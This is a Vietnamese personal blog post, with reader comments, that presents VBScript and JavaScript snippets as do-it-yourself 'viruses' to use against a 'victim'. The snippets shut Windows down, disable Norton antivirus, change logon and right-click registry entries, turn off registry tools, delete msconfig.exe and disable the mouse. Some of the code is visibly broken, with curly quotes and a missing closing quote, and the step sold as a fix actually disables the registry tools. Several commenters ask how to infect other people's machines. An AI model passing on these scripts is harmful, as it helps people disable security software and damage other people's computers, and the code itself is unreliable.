IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
IPB WARNING [2] Illegal string offset 'member_id' (Line: 544 of /modules/blog/lib/lib_blogfunctions.php)
cách tạo virut đơn giản
†™╜ ßlog's Ñgü¥ëñ  P¶-¶üoñg ßå0*╗™†   wëllç0m  †o m¥ ßlog *ç¶-¶üç Vüï Vë

Bạn bè
kingkongvn
kingkongvn
hong_ngoc123
hong_ngoc123
babiimeo
babiimeo
amoremio
amoremio
…ñµớÇ…m内røj…
…ñµớÇ…m内røj…
babymylovely_1310^^
babymylovely_1310^^
Xem tất cả


Nhạc Audition
VOL1
VOL2
VOL3
VOL4
VOL5
VOL6
VOL7
VOL8
VOL9

Nhạc Quốc Tế HOT
VOL 1
VOL2
VOL3

 
Tham khảo thui nha có gì hem chịu trách nhiệm đâu ah`
Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 “chú” Virus dưới dạng VBSCRIPT hoặc javascript rồ ưới đây là code của một số con virus nhỏ dưới dạng VBS:

1.Không cho victim khởi động máy:

Dim wsh
Set wsh = createobject(”wscript.shell”)
wsh.run “RUNDLL32.EXE user.exe,exitwindows”

2. Disable NAV:

Dim wsh
Set wsh= CreateObject( “WScript.Shell”)
s1 = “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start”
wsh.RegWrite s1,3, “REG_DWORD”

3. Hiển thị một message mỗi khi reboot máy:

dim wsh
Set wsh = CreateObject( “WScript.Shell” )
s1 = “HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\”
s2 = “LegalNoticeCaption”
s3 = “LegalNoticeText”
wsh.RegWrite s1+s2, “http://allformy.topcities.com”
wsh.RegWrite s1+s3, “Hi ! Toi la TrungWK- Toi den tu Chip&Kitty.tk”

4. Hiển thị một dòng lệnh khi click vào file hay folder:

set reg=createobject(”WScript.shell”)
reg.regwrite “HKEY_CLASSES_ROOT\*\Shell\\”,”Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk”
reg.regwrite “HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu Chip&Kitty.tk\”,”Robinhood”

5. Làm cho các trò trên hoạt động bình thường:

Dim objShell
Set objShell = CreateObject( “WScript.Shell” )
s1 = “HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\”
s2 = “Policies\System\DisableRegistryTools”
objShell.RegWrite s1+s2,1, “REG_DWORD”

Dưới dạng Javascipt :

var wsh;
wsh=new ActiveXObject (”Wscript.shell”);

// Winlogon when reboot
var s1 = “HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WinLogon\\”;
var s2 = “LegalNoticeCaption”;
var s3 = “LegalNoticeText”;
wsh.RegWrite (s1+ s2, “http://allformy.topcities.com”) ;
wsh.RegWrite (s1+s3, “Hi ! Toi la Anti_Love. Toi den tu Chip&Kitty.com”) ;

//Disable Registry
var s1 = “HKEY_USERS\\.Default\\Software\\Microsoft\\Windows\\CurrentVersion\\”;
var s2 = “Policies\\System\\DisableRegistryTools” ;
wsh.RegWrite (s1+s2,0,”REG_DWORD”);

//Delete file Msconfig.exe làm cho victim khởi động tới Registry luôn

var fso;
fso=new ActiveXObject(”Scripting.FileSystemObject”);
var fe=fso.getfile(”C:\\windows\\msconfig.exe);
fe.delete true;

//Disable Mouse

wsh.run (”RUNDLL32.EXE mouse,disable”);

//Hang up windows

wsh.run (”rundll32 user,disableoemlayer”);« Các bài cũ hơn · †™╜ ßlog's Ñgü¥ëñ P¶-¶üoñg ßå0*╗™† wëllç0m †o m¥ ßlog *ç¶-¶üç Vüï Vë · Các bài mới hơn »

Bình luận

tran hoai nam
Sep 2 2008, 08:12 PM
Bình luận #1


Unregistered

cho mình hỏi cách chèn một đoạn mã vào trang web thì vào đâu vậy
Quote Post
nguyen tuan anh
Sep 28 2008, 10:27 AM
Bình luận #2


Unregistered

8.gif
Quote Post
dang thien
Apr 3 2009, 07:16 PM
Bình luận #3


Unregistered

cop vao wordpad rui luu lai thui ha`con neu muon huy no thi lam sao pit ko ?
Quote Post
Guest_hai_*
Apr 25 2009, 02:35 AM
Bình luận #4


Unregistered

trang web so wa di.ma chang nhin thay gi ca
Quote Post
khanh_adam
May 16 2009, 02:49 AM
Bình luận #5


Unregistered

to nghe nhac cua cac ban cung hay do nhung cac ban vao web nay cua toi xem nhe http://khanhadamclub.tk/
Quote Post
hao
May 27 2009, 07:12 AM
Bình luận #6


Unregistered

[background=purple][/background][size=2][/size]
[color=orangered][/color] 9.gif
Quote Post
kokono
Jun 12 2009, 11:48 AM
Bình luận #7


Unregistered

[background=rolblue][/background][color=blue][/color]
Quote Post
kokono
Jun 12 2009, 11:49 AM
Bình luận #8


Unregistered

lam` sao de^~ tao mot^ vi rut' va` tha~ vao` may' chu~ thi` lam` sao cach' ban coa' the^~ cho minh` biet^' lam` the^' nao` hok zay^
Quote Post
kokono
Jun 12 2009, 11:50 AM
Bình luận #9


Unregistered

yahoo chat' cua~ minh` la` biettimemnoidau_112_dn cac' ban coa' the^~ giup' minh` duoc* hok a` minh` hok biet^' cach' nen^ minh` moi' nho` cac' ban chi~ cac' ban coa' the^~ giup' duo* hem
Quote Post
Guest_toilaai_*
Jun 23 2009, 04:51 PM
Bình luận #10


Unregistered

kho hiu? vai~[move]
Quote Post
DuongMinhHieu
Jan 1 2010, 01:50 PM
Bình luận #11


Unregistered

cach taO vỉut khó wa.ních chát bạn mình là : girlquay016 ha~y cho vài kon virút vào nha!!!!!!!!!!!!!!:D
Quote Post
Guest_son_*
Apr 3 2010, 02:00 PM
Bình luận #12


Unregistered

hay thiet nhung ma lai kho.tai chua coa vi du
Quote Post

 

> Trả lời nhanh
Nhập vào tên của bạn:
Nhập mã số xác nhận (bắt buộc):
» Hiển thị cửa sổ mặt cười       » Download bộ gõ tiếng Việt Unikey
 Bạn có muốn chuyển các ký hiệu như :) :( :D ...thành mặt cười trong bài viết này?
 Bạn có muốn chèn thêm chữ ký vào bài viết này ?
 


 
Mong chờ


Lượt xem thứ:

Mạng xã hội của người Việt Nam.
VnVista I-Shine © 2005 - 2018 VnVista.com